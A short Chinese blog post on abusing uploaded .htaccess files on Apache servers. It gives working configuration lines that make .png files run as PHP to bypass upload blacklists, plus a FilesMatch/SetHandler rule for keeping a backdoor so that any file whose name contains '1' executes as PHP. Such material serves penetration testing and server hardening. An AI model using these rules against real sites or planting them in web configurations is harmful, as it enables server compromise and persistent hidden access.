.htaccess文件上传利用

一般.htaccess可以用来留后门和针对黑名单绕过

创建一个txt写入

AddType  application/x-httpd-php    .png

打开另存为

保存类型为所有文件

上传.htaccess 必须是网站根路径

让png解析为php

2.留后门可以在.htaccess 加入php解析规则

类似于把文件名包含1的解析成php

<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>

123456.png 就会以php执行

posted @ 2019-06-30 12:43 紅人阅读(4663) 评论(0) 编辑收藏举报

刷新页面返回顶部

MSRC TOP100